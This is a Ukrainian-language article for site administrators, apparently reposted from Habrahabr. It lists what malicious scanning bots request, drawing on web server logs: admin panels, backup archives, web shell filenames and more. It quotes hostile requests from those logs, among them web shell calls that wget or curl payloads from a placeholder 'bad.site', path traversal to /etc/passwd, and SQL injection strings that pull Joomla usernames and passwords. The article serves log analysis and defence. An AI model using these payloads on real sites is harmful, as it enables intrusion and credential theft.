Що і навіщо шукають на сайтах «боти темної сторони сили»

Що таке «боти темної сторони сили»? Позначимо так скануючі програми (пошукові роботи, павуки), які використовують зловмисники. На відміну від роботів пошукових систем [1, 2], «боти темної сторони сили» (надалі для стислості — боти) зайняті пошуком вразливостей, шкідливих програмних закладок, конфіденційної інформації і т. д. Дії, аналогічні роботи бота, може виконувати і людина, але використання бота, зі зрозумілих причин, ефективніше і більш поширене.

При підготовці матеріалу використані журнали (веб-серверів і систем управління контентом) декількох сайтів. Обрані найбільш типові і найбільш наочні приклади.

Що ж і навіщо шукають?

Адміністративна панель

Адміністративна панель, панель управління або «адмінка» — одна з найбільш поширених цілей. Завдання: визначити використовуваний CMS, встановити точну адресу скрипта панелі для подальшого підбору пароля.

Приклади (для CMS WordPress [3]):

example.org/wp-login.php (перевірка «в лоб»)
example.org/wp-admin/ (перебираються типові каталоги)
example.org/dir/dir/wp-login.php (перебираються всі доступні каталоги)
example.org/wp-admin/images/wordpress-logo.png (спроба маскування сканування, коли перевіряється не сам скрипт, а характерне зображення або css файл)

Подібне сканування ведеться постійно і не повинно вас сильно турбувати, особливо якщо ви не використовуєте CMS WordPress, як у наведеному прикладі. В якості міри протидії доцільно обмежити доступ до каталогу з скриптами адміністративної панелі засобами веб-сервера.htaccess і .htpasswd для Apache), не забуваючи про обов'язкову стійкість паролів в використовуваної CMS.

Додаткові прикладиexample.org/admin.php
example.org/admin
example.org/bitrix/admin/
example.org/index.php/admin/
example.org/netcat/admin/
example.org/adminmysql/scripts/setup.php
example.org/apache-default/phpmyadmin/scripts/setup.php
example.org/cpadmin/scripts/setup.php
example.org/cpadmindb/scripts/setup.php
example.org/databaseadmin/scripts/setup.php
example.org/forum/phpmyadmin/scripts/setup.php
example.org/mydatadmin/scripts/setup.php
example.org/mysql-admin/scripts/setup.php
example.org/php-myadmin/scripts/setup.php
example.org/phpMyAdmin-2.11.1/scripts/setup.php
example.org/web/phpmyadmin/scripts/setup.php

Як видно з цих прикладів, здійснюються спроби знайти не тільки адміністративні панелі CMS, але і допоміжних систем або програм адміністрування. Перебираються різні варіанти назв скриптів і каталогів, включаючи найбільш поширені суфікси версій. Деякі адміністратори вважають, що змінивши ім'я скрипта або каталогу (зберігши при цьому чіткість і зрозумілість назви), вони зможуть перехитрити ботів і захистити систему. На жаль, це далеко не так.

Архіви з характерними іменами

Архіви з резервними копіями або установочними пакетами — цінна здобич для зловмисників, оскільки в них можуть міститися паролі доступу до адміністративної панелі, файли з налаштуваннями, параметри доступу до СУБД, повні копії баз даних та ін

Приклади:

example.org/example.org.tar.gz
example.org/backup.zip
example.org/example.org.zip
example.org/public_html.tar.gz
example.org/public_html.zip
example.org/www.zip
example.org/dir/dir.zip

Зверніть увагу, що багато архіватори, в т. ч. встановлені на серверах хостингових компаній, ставлять за замовчуванням ім'я файлу-архіву рівним каталогу, що архівується або в якій розташовані дані, призначені для архівації. Ця особливість широко використовується ботами, як видно з прикладів вище.
Іноді можна зустріти спроби підбору імен файлів-архівів від поширених систем резервного копіювання. При використанні типового алгоритму формування імен файлів і дат випуску оновлень кількість комбінацій значно скорочується. Незважаючи на наявність у деяких систем резервного копіювання сайтів вбудованих механізмів захисту (таких як .htaccess з «deny from all»), вони можуть виявитися не ефективні при зміні веб-сервера і з деяких інших причин.

Доцільно оперативно видаляти файли з архівами, що містять важливу таємницю або конфіденційну інформацію, т. к. вони постійно знаходяться в сфері інтересів ботів.

Пастки

При виявленні підозрілих звернень в процесі аналізу журналів у адміністратора виникає бажання глибше розібратися в ситуації. На це і орієнтуються зловмисники.

З журналів, як правило, можливо відновити значення поля HTTP referer. Дане поле клієнт (бот) може встановлювати довільно, тому адміністратор повинен проявляти певну обережність при поводженні з отриманими даними. Можливі варіанти: посилання на фішинговий сайт або сайт з шкідливим ПЗ, рекламне посилання, виконання скрипта, стисненого системою скорочення посилань.

Краще не розглядати значення поля HTTP referer як достовірну інформацію і, якщо перейти за посиланням дуже хочеться, попередньо перевірити посилання на сайтах антивірусних компаній і VirusTotoal.

Все це повинні знати і розуміти, але нагадаємо, що переходити з невідомих посиланнями категорично заборонено, особливо коли ви працюєте на сервері з привілеями адміністратора.
Приклади посилань, зі зрозумілих причин, приводити не будемо.

«Чарівні» каталоги

Які каталоги (підрозділи), які використовуються ботами найчастіше? Наведемо приклади без додаткових коментарів, орієнтуючись тільки на відносну частоту. Слід відразу обмовитися, що вибірка залежить від обстежених сайтів і включення (виключення) каталогів, що використовуються для пошуку адміністративних панелей.

«Чарівні» каталогиexample.org/.svn/
example.org/apache-default/
example.org/backup/
example.org/cache/
example.org/home/
example.org/install/
example.org/ispmgr/
example.org/log/
example.org/map/
example.org/node/
example.org/old/
example.org/pages/
example.org/pgu/
example.org/save/
example.org/scripts/
example.org/tmp/
example.org/user/
example.org/users/
example.org/uslugi/
example.org/webmanage/


Шкідливі програмні закладки

Спочатку розглянемо приклади:

example.org/explore.php
example.org/images/join.php
example.org/images/register.php
example.org/images/signup.php
example.org/images/stories/busuk.inc.php
example.org/images/webadmin.php
example.org/libraries/libraries.php
example.org/stories/food.php
example.org/tmp/petx.php
example.org/xmlrpc.php

Перераховані вище файли не повинні бути присутніми на [досліджуваних] сайтах. Якщо у вас досить велика вибірка з декількох майданчиків, то можна виділити такі цілеспрямовані спроби. Зверніть увагу на додаткові приклади, що ілюструють використання подібних скриптів зловмисниками:

example.org/images/do.php?act=reg
example.org/images/stories/racrew.php?cmd=wget bad.site/img/icons/tempe.gif; mv tempe.gif menu.php
example.org/naskleng.php?cmd=wget bad.site/components/com_content/teli.tar.gz; curl-O bad.site/components/com_content/teli.tar.gz; lwp-download bad.site...

Звідки вони беруться? Як правило, все банально: варез або злом (через застарілі і не оновлені вчасно CMS або компоненти і ін).

Нестаріюча класика — SQL injection та переходи по каталогам

Обмежимося прикладами без докладних міркувань, що це і як має працювати, за задумом авторів.

класикаexample.org/index.php?option=../../../../../../../../../../etc/passwd\0&sitemap=1
example.org/index.php?option=/../../../../../../../../../../proc/self/environ&sitemap=1
example.org/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(1234,0x3B,4321),4,5,6,7,8,9,10--
example.org/index.php?option=com_kunena&func=userlist&search=\"%" and 1=2) union select 1, concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype),«Super Administrator»,«email»,…
example.org/index.php?option=com_linx&Itemid=101«and(select/**/1/**/from(select/**/count(*),concat((select/**/username/**/from/**/jos_users/**/where/**/usertype=0x73757065722061646d696e6973747261746f72…
example.org/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,234567--
example.org/index.php/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1+union+select+1,concat(0x7e,table_name,0x7e)+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--


Замість висновку

Дивіться і аналізуйте журнали експлуатованих систем (не тільки web). Це може стане в нагоді в самий невідповідний момент.

Джерело: Хабрахабр

0 коментарів

Тільки зареєстровані та авторизовані користувачі можуть залишати коментарі.